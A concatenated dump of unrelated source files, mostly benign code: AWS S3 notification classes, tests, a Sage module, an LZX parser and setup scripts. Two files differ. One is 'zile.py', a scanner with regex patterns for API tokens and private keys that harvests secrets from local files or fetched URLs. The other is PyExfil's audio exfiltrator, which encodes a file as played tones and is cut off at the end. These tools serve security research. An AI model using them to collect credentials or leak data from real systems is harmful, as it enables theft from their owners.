"as destination of your notification {}"
).format(bucket_notification_configuration)
)
return {'lambda': LambdaFunctionNotification,
'queue': QueueNotification,
'topic': TopicNotification}.get(
list(notification_type)[0])(
id=id,
bucket_notification_configuration=bucket_notification_configuration,
**data
)
def get_destination_arn(self):
pass
def register_destination_publish_permission(self, template):
pass
class LambdaFunctionNotification(BaseNotification):
api_property = 'LambdaFunctionConfigurations'
def register_destination_publish_permission(self, template):
template.add_resource(
awslambda.Permission(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Action="lambda:InvokeFunction",
FunctionName=self.get_destination_arn(),
Principal="s3.amazonaws.com",
SourceAccount=troposphere.Ref(troposphere.AWS_ACCOUNT_ID),
SourceArn=self.bucket_notification_configuration.get_bucket_arn()
)
)
def get_destination_arn(self):
return troposphere.Ref(
self.bucket_notification_configuration.project.reference(
utils.lambda_friendly_name_to_grn(
self.settings['lambda']
)
)
)
class QueueNotification(BaseNotification):
api_property = 'QueueConfigurations'
def get_destination_arn(self):
destination = self.settings['queue']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
if destination.startswith('arn:aws:'):
return destination
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join(":", [
"arn:aws:sqs",
region,
account,
destination
])
def get_destination_url(self):
destination = self.settings['queue']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join("", [
"https://sqs.",
region,
".amazonaws.com/",
account,
"/",
destination
])
def register_destination_publish_permission(self, template):
template.add_resource(
sqs.QueuePolicy(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Queues=[self.get_destination_url()],
PolicyDocument={
"Version": "2008-10-17",
"Id": "PublicationPolicy",
"Statement": [{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["sqs:SendMessage"],
"Resource": self.get_destination_arn(),
"Condition": {
"ArnEquals": {"aws:SourceArn": self.bucket_notification_configuration.get_bucket_arn()}
}
}]
}
)
)
class TopicNotification(BaseNotification):
api_property = 'TopicConfigurations'
def get_destination_arn(self):
destination = self.settings['topic']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
if destination.startswith('arn:aws:'):
return destination
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join(":", [
"arn:aws:sns",
region,
account,
destination
])
def register_destination_publish_permission(self, template):
template.add_resource(
sns.TopicPolicy(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Topics=[self.get_destination_arn()],
PolicyDocument={
"Version": "2008-10-17",
"Id": "PublicationPolicy",
"Statement": [{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["sns:Publish"],
"Resource": self.get_destination_arn(),
"Condition": {
"ArnEquals": {"aws:SourceArn": self.bucket_notification_configuration.get_bucket_arn()}
}
}]
}
)
)
class BucketNotificationConfiguration(base.BaseResource):
grn_type = 's3-bucket-notification'
required_settings = (
'bucket',
'notifications',
)
def __init__(self, *args, **kwargs):
super(BucketNotificationConfiguration, self).__init__(*args, **kwargs)
self._notifications = {}
for notification_id, notification_data in six.iteritems(self.settings.get('notifications', {})):
self._notifications[notification_id] = BaseNotification.from_dict(
id=notification_id,
data=notification_data,
bucket_notification_configuration=self
)
self._validate_notifications()
def get_bucket_arn(self):
bucket_name = self.get_bucket_name()
return troposphere.Join("", ["arn:aws:s3:::", bucket_name])
def get_bucket_name(self):
bucket = self.settings.get('bucket')
if isinstance(bucket, troposphere.Ref):
return bucket
return bucket
def _validate_notifications(self):
# Validate that all key prefix/suffix filters for a bucket
# don't overlap one to each other.
all_filters = defaultdict(list)
for notification_id, notification in six.iteritems(self._notifications):
for name, value in notification.filters:
all_filters[name].append(value)
overlap_checks = {'prefix': 'startswith', 'suffix': 'endswith'}
for filter_type, values in six.iteritems(all_filters):
check = overlap_checks.get(filter_type)
# Don't check fields that are Ref instances
# since Refs aren't bound until apply
if isinstance(check, Ref):
continue
overlaps = [sum([int(getattr(v, check)(z)) for z in values]) for v in values]
if sum(overlaps) > len(values):
raise exceptions.ResourceValidationError(
"One or more {} filters overlap one to each other {}.".format(
filter_type,
', '.join(values)
)
)
def register_resources_template(self, template):
extra = defaultdict(list)
for notification_id, notification in six.iteritems(self._notifications):
notification.register_destination_publish_permission(template)
extra[notification.api_property].append(
NotificationConfiguration(
Id=troposphere.Join('-', ['gordon', notification.id]),
DestinationArn=notification.get_destination_arn(),
Events=[e for e, _, _ in notification.events],
KeyFilters=[KeyFilter(Name=name, Value=value) for name, value in notification.filters]
)
)
bucket_notification_configuration_lambda = 'lambda:contrib_s3:bucket_notification_configuration:current'
template.add_resource(
S3BucketNotificationConfiguration.create_with(
utils.valid_cloudformation_name(self.name),
DependsOn=[self.project.reference(bucket_notification_configuration_lambda)],
lambda_arn=troposphere.Ref(self.project.reference(bucket_notification_configuration_lambda)),
Bucket=self.get_bucket_name(),
**dict([[k, v] for k, v in six.iteritems(extra) if v])
)
)
def validate(self):
"""Validate that there are no any other resources in the project which
try to register notifications for the same bucket than this resource"""
for resource in \
(r for r in self.project.get_resources() if isinstance(r, self.__class__) and r.bucket == self.bucket):
raise exceptions.ResourceValidationError(
("Both resources '{}' and '{}', registers notifications for "
"the bucket '{}'. Because AWS API limitations we need you to "
"register all notifications of one bucket in the same "
"resource.").format(self, resource, self.bucket)
)
|
tests/test_overrides.py | alexmusa/adt | 153 | 11178422 | <filename>tests/test_overrides.py
import unittest
from adt import Case, adt
from tests import helpers
from typing import Callable, Optional, TypeVar
_T = TypeVar('_T')
def optionality(x: _T) -> Optional[_T]:
return x
@adt
class OverriddenAccessors:
INTVALUE: Case[int]
STRVALUE: Case[str]
@property
def intvalue(self) -> Optional[int]:
return self.match(intvalue=lambda x: optionality(x),
strvalue=lambda _: None)
@property
def strvalue(self) -> Optional[str]:
return self.match(intvalue=lambda _: None,
strvalue=lambda x: optionality(x))
@adt
class OverriddenMatch:
INTVALUE: Case[int]
STRVALUE: Case[str]
def match(self, intvalue: Callable[[int], str],
strvalue: Callable[[str], str]) -> str:
try:
x = self.intvalue()
except:
return strvalue(self.strvalue())
return intvalue(x)
class TestOverrides(unittest.TestCase):
def test_overriddenAccessorIntvalue(self) -> None:
x = OverriddenAccessors.INTVALUE(5)
self.assertEqual(x.intvalue, 5)
self.assertIsNone(x.strvalue)
self.assertEqual(
x.match(intvalue=lambda x: x,
strvalue=helpers.invalidPatternMatch), 5)
def test_overriddenAccessorStrvalue(self) -> None:
x = OverriddenAccessors.STRVALUE("foobar")
self.assertIsNone(x.intvalue)
self.assertEqual(x.strvalue, "foobar")
self.assertEqual(
x.match(intvalue=helpers.invalidPatternMatch,
strvalue=lambda x: x), "foobar")
def test_overriddenMatchIntvalue(self) -> None:
x = OverriddenMatch.INTVALUE(5)
self.assertEqual(x.intvalue(), 5)
self.assertEqual(
x.match(intvalue=lambda x: str(x),
strvalue=helpers.invalidPatternMatch), "5")
def test_overriddenMatchStrvalue(self) -> None:
x = OverriddenMatch.STRVALUE("foobar")
self.assertEqual(x.strvalue(), "foobar")
self.assertEqual(
x.match(intvalue=helpers.invalidPatternMatch,
strvalue=lambda x: x), "foobar") |
src/sage/monoids/hecke_monoid.py | bopopescu/sage | 1,742 | 11178524 | <reponame>bopopescu/sage
# -*- coding: utf-8 -*-
"""
Hecke Monoids
"""
#*****************************************************************************
# Copyright (C) 2015 <NAME> <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.cachefunc import cached_function
from sage.sets.finite_set_maps import FiniteSetMaps
@cached_function
def HeckeMonoid(W):
r"""
Return the `0`-Hecke monoid of the Coxeter group `W`.
INPUT:
- `W` -- a finite Coxeter group
Let `s_1,\ldots,s_n` be the simple reflections of `W`. The 0-Hecke
monoid is the monoid generated by projections `\pi_1,\ldots,\pi_n`
satisfying the same braid and commutation relations as the `s_i`.
It is of same cardinality as `W`.
.. NOTE::
This is currently a very basic implementation as the submonoid
of sorting maps on `W` generated by the simple projections of
`W`. It's only functional for `W` finite.
.. SEEALSO::
- :class:`CoxeterGroups`
- :class:`CoxeterGroups.ParentMethods.simple_projections`
- :class:`IwahoriHeckeAlgebra`
EXAMPLES::
sage: from sage.monoids.hecke_monoid import HeckeMonoid
sage: W = SymmetricGroup(4)
sage: H = HeckeMonoid(W); H
0-Hecke monoid of the Symmetric group of order 4! as a permutation group
sage: pi = H.monoid_generators(); pi
Finite family {1: ..., 2: ..., 3: ...}
sage: all(pi[i]^2 == pi[i] for i in pi.keys())
True
sage: pi[1] * pi[2] * pi[1] == pi[2] * pi[1] * pi[2]
True
sage: pi[2] * pi[3] * pi[2] == pi[3] * pi[2] * pi[3]
True
sage: pi[1] * pi[3] == pi[3] * pi[1]
True
sage: H.cardinality()
24
"""
ambient_monoid = FiniteSetMaps(W, action="right")
pi = W.simple_projections(length_increasing=True).map(ambient_monoid)
H = ambient_monoid.submonoid(pi)
H.rename("0-Hecke monoid of the %s"%W)
return H
|
lib/hachoir/parser/archive/lzx.py | 0x20Man/Watcher3 | 320 | 11178525 | """LZX data stream parser.
Also includes a decompression function (slow!!) which can decompress
LZX data stored in a Hachoir stream.
Author: <NAME>
Creation date: July 18, 2007
"""
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt32, Bit, Bits, PaddingBits,
RawBytes, ParserError)
from hachoir.core.endian import MIDDLE_ENDIAN, LITTLE_ENDIAN
from hachoir.core.tools import paddingSize
from hachoir.parser.archive.zlib import build_tree, HuffmanCode, extend_data
class LZXPreTreeEncodedTree(FieldSet):
def __init__(self, parent, name, num_elements, *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.num_elements = num_elements
def createFields(self):
for i in range(20):
yield Bits(self, "pretree_lengths[]", 4)
pre_tree = build_tree(
[self['pretree_lengths[%d]' % x].value for x in range(20)])
if not hasattr(self.root, "lzx_tree_lengths_" + self.name):
self.lengths = [0] * self.num_elements
setattr(self.root, "lzx_tree_lengths_" + self.name, self.lengths)
else:
self.lengths = getattr(self.root, "lzx_tree_lengths_" + self.name)
i = 0
while i < self.num_elements:
field = HuffmanCode(self, "tree_code[]", pre_tree)
if field.realvalue <= 16:
self.lengths[i] = (self.lengths[i] - field.realvalue) % 17
field._description = "Literal tree delta length %i (new length value %i for element %i)" % (
field.realvalue, self.lengths[i], i)
i += 1
yield field
elif field.realvalue == 17:
field._description = "Tree Code 17: Zeros for 4-19 elements"
yield field
extra = Bits(self, "extra[]", 4)
zeros = 4 + extra.value
extra._description = "Extra bits: zeros for %i elements (elements %i through %i)" % (
zeros, i, i + zeros - 1)
yield extra
self.lengths[i:i + zeros] = [0] * zeros
i += zeros
elif field.realvalue == 18:
field._description = "Tree Code 18: Zeros for 20-51 elements"
yield field
extra = Bits(self, "extra[]", 5)
zeros = 20 + extra.value
extra._description = "Extra bits: zeros for %i elements (elements %i through %i)" % (
zeros, i, i + zeros - 1)
yield extra
self.lengths[i:i + zeros] = [0] * zeros
i += zeros
elif field.realvalue == 19:
field._description = "Tree Code 19: Same code for 4-5 elements"
yield field
extra = Bits(self, "extra[]", 1)
run = 4 + extra.value
extra._description = "Extra bits: run for %i elements (elements %i through %i)" % (
run, i, i + run - 1)
yield extra
newfield = HuffmanCode(self, "tree_code[]", pre_tree)
assert newfield.realvalue <= 16
newfield._description = "Literal tree delta length %i (new length value %i for elements %i through %i)" % (
newfield.realvalue, self.lengths[i], i, i + run - 1)
self.lengths[
i:i + run] = [(self.lengths[i] - newfield.realvalue) % 17] * run
i += run
yield newfield
class LZXBlock(FieldSet):
WINDOW_SIZE = {15: 30,
16: 32,
17: 34,
18: 36,
19: 38,
20: 42,
21: 50}
POSITION_SLOTS = {0: (0, 0, 0),
1: (1, 1, 0),
2: (2, 2, 0),
3: (3, 3, 0),
4: (4, 5, 1),
5: (6, 7, 1),
6: (8, 11, 2),
7: (12, 15, 2),
8: (16, 23, 3),
9: (24, 31, 3),
10: (32, 47, 4),
11: (48, 63, 4),
12: (64, 95, 5),
13: (96, 127, 5),
14: (128, 191, 6),
15: (192, 255, 6),
16: (256, 383, 7),
17: (384, 511, 7),
18: (512, 767, 8),
19: (768, 1023, 8),
20: (1024, 1535, 9),
21: (1536, 2047, 9),
22: (2048, 3071, 10),
23: (3072, 4095, 10),
24: (4096, 6143, 11),
25: (6144, 8191, 11),
26: (8192, 12287, 12),
27: (12288, 16383, 12),
28: (16384, 24575, 13),
29: (24576, 32767, 13),
30: (32768, 49151, 14),
31: (49152, 65535, 14),
32: (65536, 98303, 15),
33: (98304, 131071, 15),
34: (131072, 196607, 16),
35: (196608, 262143, 16),
36: (262144, 393215, 17),
37: (393216, 524287, 17),
38: (524288, 655359, 17),
39: (655360, 786431, 17),
40: (786432, 917503, 17),
41: (917504, 1048575, 17),
42: (1048576, 1179647, 17),
43: (1179648, 1310719, 17),
44: (1310720, 1441791, 17),
45: (1441792, 1572863, 17),
46: (1572864, 1703935, 17),
47: (1703936, 1835007, 17),
48: (1835008, 1966079, 17),
49: (1966080, 2097151, 17),
}
def createFields(self):
yield Bits(self, "block_type", 3)
yield Bits(self, "block_size", 24)
self.uncompressed_size = self["block_size"].value
self.compression_level = self.root.compr_level
self.window_size = self.WINDOW_SIZE[self.compression_level]
self.block_type = self["block_type"].value
curlen = len(self.parent.uncompressed_data)
if self.block_type in (1, 2): # Verbatim or aligned offset block
if self.block_type == 2:
for i in range(8):
yield Bits(self, "aligned_len[]", 3)
aligned_tree = build_tree(
[self['aligned_len[%d]' % i].value for i in range(8)])
yield LZXPreTreeEncodedTree(self, "main_tree_start", 256)
yield LZXPreTreeEncodedTree(self, "main_tree_rest", self.window_size * 8)
main_tree = build_tree(
self["main_tree_start"].lengths + self["main_tree_rest"].lengths)
yield LZXPreTreeEncodedTree(self, "length_tree", 249)
length_tree = build_tree(self["length_tree"].lengths)
current_decoded_size = 0
while current_decoded_size < self.uncompressed_size:
if (curlen + current_decoded_size) % 32768 == 0 and (curlen + current_decoded_size) != 0:
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
field = HuffmanCode(self, "main_code[]", main_tree)
if field.realvalue < 256:
field._description = "Literal value %r" % chr(
field.realvalue)
current_decoded_size += 1
self.parent.uncompressed_data += chr(field.realvalue)
yield field
continue
position_header, length_header = divmod(
field.realvalue - 256, 8)
info = self.POSITION_SLOTS[position_header]
if info[2] == 0:
if info[0] == 0:
position = self.parent.r0
field._description = "Position Slot %i, Position [R0] (%i)" % (
position_header, position)
elif info[0] == 1:
position = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position [R1] (%i)" % (
position_header, position)
elif info[0] == 2:
position = self.parent.r2
self.parent.r2 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position [R2] (%i)" % (
position_header, position)
else:
position = info[0] - 2
self.parent.r2 = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position %i" % (
position_header, position)
else:
field._description = "Position Slot %i, Positions %i to %i" % (
position_header, info[0] - 2, info[1] - 2)
if length_header == 7:
field._description += ", Length Values 9 and up"
yield field
length_field = HuffmanCode(
self, "length_code[]", length_tree)
length = length_field.realvalue + 9
length_field._description = "Length Code %i, total length %i" % (
length_field.realvalue, length)
yield length_field
else:
field._description += ", Length Value %i (Huffman Code %i)" % (
length_header + 2, field.value)
yield field
length = length_header + 2
if info[2]:
if self.block_type == 1 or info[2] < 3: # verbatim
extrafield = Bits(
self, "position_extra[%s" % field.name.split('[')[1], info[2])
position = extrafield.value + info[0] - 2
extrafield._description = "Position Extra Bits (%i), total position %i" % (
extrafield.value, position)
yield extrafield
else: # aligned offset
position = info[0] - 2
if info[2] > 3:
extrafield = Bits(
self, "position_verbatim[%s" % field.name.split('[')[1], info[2] - 3)
position += extrafield.value * 8
extrafield._description = "Position Verbatim Bits (%i), added position %i" % (
extrafield.value, extrafield.value * 8)
yield extrafield
if info[2] >= 3:
extrafield = HuffmanCode(
self, "position_aligned[%s" % field.name.split('[')[1], aligned_tree)
position += extrafield.realvalue
extrafield._description = "Position Aligned Bits (%i), total position %i" % (
extrafield.realvalue, position)
yield extrafield
self.parent.r2 = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
self.parent.uncompressed_data = extend_data(
self.parent.uncompressed_data, length, position)
current_decoded_size += length
elif self.block_type == 3: # Uncompressed block
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
else:
yield PaddingBits(self, "padding[]", 16)
self.endian = LITTLE_ENDIAN
yield UInt32(self, "r[]", "New value of R0")
yield UInt32(self, "r[]", "New value of R1")
yield UInt32(self, "r[]", "New value of R2")
self.parent.r0 = self["r[0]"].value
self.parent.r1 = self["r[1]"].value
self.parent.r2 = self["r[2]"].value
yield RawBytes(self, "data", self.uncompressed_size)
self.parent.uncompressed_data += self["data"].value
if self["block_size"].value % 2:
yield PaddingBits(self, "padding", 8)
else:
raise ParserError("Unknown block type %d!" % self.block_type)
class LZXStream(Parser):
endian = MIDDLE_ENDIAN
def createFields(self):
self.uncompressed_data = ""
self.r0 = 1
self.r1 = 1
self.r2 = 1
yield Bit(self, "filesize_indicator")
if self["filesize_indicator"].value:
yield UInt32(self, "filesize")
while self.current_size < self.size:
block = LZXBlock(self, "block[]")
yield block
if self.size - self.current_size < 16:
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
break
def lzx_decompress(stream, window_bits):
data = LZXStream(stream)
data.compr_level = window_bits
for unused in data:
pass
return data.uncompressed_data
|
Unix/scriptext/py/setup.py | Beguiled/omi | 165 | 11178557 | <filename>Unix/scriptext/py/setup.py<gh_stars>100-1000
import os
from distutils.core import setup, Extension
#hardcoded directory, need to be updated
dirs = "/tmp/omi-latest"
setup(name='PMI_Instance',version = '1.0', ext_modules = [Extension('mi.PMI_Instance',sources=['PMI_Instance.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='PMI_Class',version = '1.0', ext_modules = [Extension('mi.PMI_Class',sources=['PMI_Class.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='PMI_Session',version = '1.0', ext_modules = [Extension('mi.PMI_Session',sources=['PMI_Session.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='mi', version='1.0',
ext_modules=[Extension('mi',
sources=['PythonBinding.c'],
extra_compile_args=['-O0'],
runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include']
)])
|
tests/components/sensibo/__init__.py | MrDelik/core | 22,481 | 11178558 | <reponame>MrDelik/core
"""Tests for the Sensibo integration."""
|
PhysicsTools/PatExamples/python/JetEnergyShift_cfi.py | ckamtsikis/cmssw | 852 | 11178574 | import FWCore.ParameterSet.Config as cms
scaledJets = cms.EDProducer("JetEnergyShift",
inputJets = cms.InputTag("cleanPatJets"),
inputMETs = cms.InputTag("patMETs"),
scaleFactor = cms.double(1.0),
jetPTThresholdForMET = cms.double(20.),
jetEMLimitForMET = cms.double(0.9)
)
|
tablib/packages/xlwt/examples/hyperlinks.py | rhunwicks/tablib | 372 | 11178577 | #!/usr/bin/env python
# -*- coding: windows-1251 -*-
# Copyright (C) 2005 <NAME>
from xlwt import *
f = Font()
f.height = 20*72
f.name = 'Verdana'
f.bold = True
f.underline = Font.UNDERLINE_DOUBLE
f.colour_index = 4
h_style = XFStyle()
h_style.font = f
w = Workbook()
ws = w.add_sheet('F')
##############
## NOTE: parameters are separated by semicolon!!!
##############
n = "HYPERLINK"
ws.write_merge(1, 1, 1, 10, Formula(n + '("http://www.irs.gov/pub/irs-pdf/f1000.pdf";"f1000.pdf")'), h_style)
ws.write_merge(2, 2, 2, 25, Formula(n + '("mailto:<EMAIL>?subject=pyExcelerator-feedback&Body=Hello,%20Roman!";"pyExcelerator-feedback")'), h_style)
w.save("hyperlinks.xls")
|
scripts/zile/zile.py | upenderadepu/crimson | 108 | 11178588 | # github.com/xyele
import os,sys,re,requests,random
from termcolor import colored
from concurrent.futures import ThreadPoolExecutor
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Base Variables
colors = ["red","green","yellow","blue","magenta","cyan","white"]
settings = {
"threads":10,
"requestTimeout":7,
"requestUA":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
}
patterns = {
"slack_token": <KEY>
"slack_webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"facebook_oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
"twitter_oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
"twitter_access_token": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}",
"heroku_api": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"mailgun_api": "key-[0-9a-zA-Z]{32}",
"mailchamp_api": "[0-9a-f]{32}-us[0-9]{1,2}",
"picatic_api": "sk_live_[0-9a-z]{32}",
"google_oauth_id": "[0-9(+-[0-9A-Za-z_]{32}.apps.googleusercontent.com",
"google_api": "AIza[0-9A-Za-z-_]{35}",
"google_captcha": "6L[0-9A-Za-z-_]{38}",
"google_oauth": "ya29\\.[0-9A-Za-z\\-_]+",
"amazon_aws_access_key_id": "<KEY>
"amazon_mws_auth_token": "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
"amazonaws_url": "s3\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\.s3\\.amazonaws.com",
"facebook_access_token": "EAACEdEose0cBA[0-9A-Za-z]+",
"mailgun_api_key": "key-[0-9a-zA-Z]{32}",
"twilio_api_key": "SK[0-9a-fA-F]{32}",
"twilio_account_sid": "AC[a-zA-Z0-9_\\-]{32}",
"twilio_app_sid": "AP[a-zA-Z0-9_\\-]{32}",
"paypal_braintree_access_token": "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}",
"square_oauth_secret": "sq0csp-[ 0-9A-Za-z\\-_]{43}",
"square_access_token": "sqOatp-[0-9A-Za-z\\-_]{22}",
"stripe_standard_api": "sk_live_[0-9a-zA-Z]{24}",
"stripe_restricted_api": "rk_live_[0-9a-zA-Z]{24}",
"github_access_token": "[a-zA-Z0-9_-]*:[a-zA-Z0-9_\\-]+@github\\.com*",
"private_ssh_key": "-----BEGIN PRIVATE KEY-----[a-zA-Z0-9\\S]{100,}-----END PRIVATE KEY-----",
"private_rsa_key": "-----BEGIN RSA PRIVATE KEY-----[a-zA-Z0-9\\S]{100,}-----END RSA PRIVATE KEY-----",
"gpg_private_key_block": "-----BEGIN PGP PRIVATE KEY BLOCK-----",
"generic_api_key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\"][0-9a-zA-Z]{32,45}['|\"]",
"generic_secret": "[s|S][e|E][c|C][r|R][e|E][t|T].*['|\"][0-9a-zA-Z]{32,45}['|\"]",
"ip_address": "(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])",
"linkFinder": "(?:\"|')(((?:[a-zA-Z]{1,10}:\/\/|\/\/)[^\"'\/]{1,}\\.[a-zA-Z]{2,}[^\"']{0,})|((?:\/|\\.\\.\/|\\.\/)[^\"'><,;| *()(%%$^\/\\\\\\[\\]][^\"'><,;|()]{1,})|([a-zA-Z0-9_\\-\/]{1,}\/[a-zA-Z0-9_\\-\/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|#][^\"|']{0,}|))|([a-zA-Z0-9_\\-\/]{1,}\/[a-zA-Z0-9_\\-\/]{3,}(?:[\\?|#][^\"|']{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:[\\?|#][^\"|']{0,}|)))(?:\"|')",
"password_in_url": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
}
patterns = list(zip(patterns.keys(), patterns.values()))
# Base Variables
def request(url):
try:
headers = {"User-Agent":settings["requestUA"]} # define http request headers as dictionary
response = requests.get(url,timeout=settings["requestTimeout"])
print("[+] " + url)
return response.text
except Exception as e:
return ""
def printResult(x,y):
if "--colored" in args: # if colored parameter has given as argument
print(colored("[{}] {}".format(x,y),random.choice(colors))) # print output colored
else:
print("[{}] {}".format(x,y)) # print output normally
def extract(text):
for p in patterns:
pattern = r"[:|=|\'|\"|\s*|`|´| |,|?=|\]|\|//|/\*}]("+p[1]+r")[:|=|\'|\"|\s*|`|´| |,|?=|\]|\}|&|//|\*/]"
res = re.findall(re.compile(pattern),text) # try to find all patterns in text
for i in res:
printResult(p[0],i) # call printResults for each result
def splitArgs(text):
try:
return text.split("\n")
except Exception:
return text
def fromUrl(url):
if not (url.startswith("http://") or url.startswith("https://")):
extract(request("http://"+url))
extract(request("https://"+url))
else:
extract(request(url))
args = list(sys.argv)[1:]
if "--file" in args: # if file parameter has given as argument
totalFiles = []
for root, dirs, files in os.walk("."):
tempFiles = [os.path.join(os.getcwd(),os.path.join(root, i)[2:]) for i in files] # find every file under current directory
totalFiles+=tempFiles # and add them to totalFiles array
for file in totalFiles: # for each files
try:
read = open(file, "r", encoding='utf-8').read() # read them
print ("[+] " + file)
extract(read) # and call extract function
except Exception: # if it gives error
pass # just ignore it
elif "--request" in args: # if request parameter has given as argument
try:
threadPool = ThreadPoolExecutor(max_workers=settings["threads"])
pipeText = sys.stdin.read() # read urls
for r in splitArgs(pipeText):
threadPool.submit(fromUrl,r)
except UnicodeDecodeError as e:
print("[error] binary files are not supported yet.")
elif ("--help" in args) or ("-h" in args):
try:
print ("Usage:")
print ("For getting keys from file: cat file | python3 zile.py")
print ("For getting keys from urls/domains: cat urls | python3 zile.py --request")
print ("For getting keys from all files under current dir: python3 zile.py --file")
print ("For colored output use --colored parameter")
except Exception as e:
print("[error] got an exception")
else: # if none of them has given
try:
extract(str(sys.stdin.read()))
except UnicodeDecodeError as e:
print("[error] binary files are not supported yet.")
|
src/utility/convert_software_call.py | ocatak/malware_api_class | 172 | 11178596 | <reponame>ocatak/malware_api_class<filename>src/utility/convert_software_call.py
from common.HashMap import HashMap
file = open("source/CallApiMap.txt", "r")
map = HashMap()
for line in file:
line = line.strip()
if line == "":
continue
splitted = line.split("=")
print(line)
map.add(splitted[0], splitted[1])
map.print()
file.close()
s_file = open("destination/software_calls.txt", "w")
file = open("source/02-CSDMC_API_Train.csv", "r")
for line in file:
line = line.strip()
splitted = line.split(",")
if splitted[0] == "0":
continue
calls = splitted[1].split(" ")
callLine = ""
for callStr in calls:
if callLine != "":
callLine = callLine + ","
callStr = callStr.lower()
val = map.get(callStr)
if val == None:
print("hatalı durum---------------")
continue
callLine = callLine + val
s_file.write(callLine + "\n")
s_file.close()
|
pyexfil/physical/audio/exfiltrator.py | goffinet/PyExfil | 603 | 11178622 | <reponame>goffinet/PyExfil
#!/usr/bin/python
from __future__ import division #Avoid division problems in Python 2
import sys
import math
import zlib
import base64
import pyaudio
PyAudio = pyaudio.PyAudio
BITRATE = 14400
RATE = 16000
class Exfiltrator():
def __init__(self, file_path):
self.file_path = file_path
self.PyAudio = PyAudio()
self.streamer = self.PyAudio.open(format=self.PyAudio.get_format_from_width(1), channels=1, rate=BITRATE, output=True)
# WAVE = 1000
def _read_file(self):
try:
f = open(self.file_path, 'rb')
tones = base64.b64encode(zlib.compress(f.read()))
f.close()
return tones
except IOError, e:
sys.stdout.write("[!]\tError reading file '%s'.\n%s.\n" % (self.file_path, e))
raise
def _close(self):
self.streamer.stop_stream()
self.streamer.close()
self.PyAudio.terminate()
def _play_tones(self, tones):
i = 0
for tone in tones:
i+= 1
freq = ord(tone)*10
data = ''.join([chr(int(math.sin(x/((BITRATE/freq)/math.pi))*127+128)) for x in xrange(BITRATE)])[:256]
self.streamer.write(data)
if i % 10 == 0: sys.stdout.write("Played %s Bytes.\n" % i)
sys.stdout.write("Completed playing %s tones.\n" % i)
return True
def exfil(self):
tones = self._read_file()
sys.stdout.write("File '%s' is %s bytes after encoding.\n" %(self.file_path, len(tones)))
self._play_tones(tones)
self._close()
if __name__ == "__main__":
